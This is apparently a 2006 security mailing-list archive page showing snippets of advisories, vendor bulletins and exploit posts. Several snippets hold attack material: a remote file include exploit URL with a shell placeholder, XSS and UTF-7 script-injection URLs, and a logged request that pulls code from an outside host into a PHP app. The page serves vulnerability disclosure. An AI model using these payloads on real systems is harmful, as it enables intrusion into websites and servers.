http://news.com.com/2100-1002_3-6121608.html?part=rsstag=6121608subj=news
An attacker could commandeer a computer running the browser simply by crafting
a Web page that contains some malicious JavaScript code, Mischa Spiegelmock and
Andrew Wbeelsoi said in a presentation at the ToorCon hacker
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
phpMyWebmin 1.0 = (target) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by XORON(turkish hacker)
Layered Defense Research Advisory 1 October 2006
==
1) Affected Software TrendMicro OfficeScan Corporate Edition 7.3
==
2) Severity
Rating: Medium risk
Impact: Execution of arbitrary code,
---
EasyBannerFree (functions.php) Remote File Include Exploit
---
find by : abu ahmed
---
Exploit :
http://sitename.com/[ path ]/functions.php?s[phppath]=[shell
---
thanks
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
OpenPKG Security AdvisoryThe OpenPKG Project
http://www.openpkg.org/security/ http://www.openpkg.org
[EMAIL PROTECTED]
IBM Informix (IDS) V10.0 File Clobbering during Install
10/1/2006
Overview
From the Website (http://www-306.ibm.com/software/data/informix/ids/)
IBM Informix(r) Dynamic Server (IDS) is a strategic data server in
the IBM Information Management Software portfolio that provides
blazing online
Software: Pebble
Version: 2.0.0 RC1 - 2.0.0 RC2
Author: Simon Brown
Homepage: http://pebble.sourceforge.net
Abstract
Pebble is a blogging system built upon java and XML. There is no
database to store the data into but just XML is used instead.
Description
Vulnerability: XSS vulnerability in
Hello,
I would like to inform you about a vulnerability in Sunbelt Kerio Personal
Firewall.
Description:
Sunbelt Kerio Personal Firewall hooks many functions in SSDT and in at least six cases it fails to validate arguments
that come from user mode. User calls to NtCreateFile, NtDeleteFile,
The first international hacking security conference by Korean hackers will be
held
in November 16 ~ 17. The conference is POC 2006. POC means 'power of
community'.
We believe that the power of community can make the world safer.
POC 2006 hates just theoretical discussion. POC 2006
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00778900
Version: 1
HPSBUX02157 SSRT061220 rev.1 HP-UX Running Ignite-UX Server,
Remote Unauthorized Access and Privilege Elevation
NOTICE: The information in this Security Bulletin should be
# BiyoSecurity.Org
# script name : Dayfox Blog v2.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable files :
adminlog.php
postblog.php
index.php
index2.php
# Vulnerable code :
include_once ($slogin_path . /slogin_lib.inc.php);
include_once
A ZERT patch has now been released and is avilable on our site (
http://isotf.org/zert/ ).
A full patch (for limited Windows versions, which is built very nicely) is
available from Determina.
Our patch automates the Microsoft suggested workaround.
Thanks,
Gadi.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: phpMyAdmin Multiple CSRF Vulnerabilities
Release Date: 2006/10/01
Last Modified: 2006/10/01
===
Ubuntu Security Notice USN-355-1 October 02, 2006
openssh vulnerabilities
CVE-2006-4924, CVE-2006-5051
===
A security issue affects the following Ubuntu releases:
Ubuntu
===
Ubuntu Security Notice USN-356-1 October 02, 2006
gdb vulnerability
CVE-2006-4146
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.04
Ubuntu 5.10
###
#venedor : http://digishop.sumeffect.com
#
#Version : 4.0.0 (latest Version 08/25/2006 ).
#
#Exploite :
#http://example.com/shopping-cart-software/cart.php?m=product_listpageNumber=c=190v=[sortBy=[xss]search=[xss]
#
#Discoverd by :
On 10/2/06, Paul Szabo [EMAIL PROTECTED] wrote:
This provides UXSS (Universal Cross-Site Scripting):
http://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...
(with a couple of hundred Zs) will do what we want. Works for https also:
===
Ubuntu Security Notice USN-354-1 October 02, 2006
firefox vulnerabilities
CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3802,
CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807,
CVE-2006-3808, CVE-2006-3809,
Does anyone have a security contact for Myspace?
+ Title:
~~~
Microsoft Internet Information Services UTF-7 XSS Vulnerability
[http://www.geocities.jp/ptrs_sec/advisory09e.html]
+ Date:
~~~
1 October 2006
+ Author:
~~~
Eiji James Yoshida [EMAIL PROTECTED]
+ Risk:
After finding these entries in the logfile and finding a cmd.html-file in this
directory, I was disconnected because I was working as a phishing-site.
POST
/WebCalendar/tools/send_reminders.php?includedir=http://65.xxx.xx.xxx/dir/a.txt?
HTTP/1.1 200 7315
In other words, the attacker has
+ Solution:
+ Add this line to your php-file:
+
+ $application_rootdir =user/dir //Your root path
=== 0-o
i guess you should learn some PHP before posting on bugtracks ...
net2ftp: a web based FTP client :) = Remote File Inclusion
=== you should try your PoC before posting ,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00717872
Version: 1
HPSBUX02129 SSRT061149 rev.1 - HP-UX running SLP, Remote Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as soon
as possible.
Hello str0ke,
I reviewed the exploits listed. Yes, all of them use the shell but they
exploit trivially shell-exploitable bugs (like race conditions, ld-preload,
etc) or include other external programs (like cc, perl, etc) or assume
Linux/bash as well as other more or less recent environments.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
=
FreeBSD-SA-06:22.opensshSecurity Advisory
The FreeBSD Project
Topic:
25 matches
Mail list logo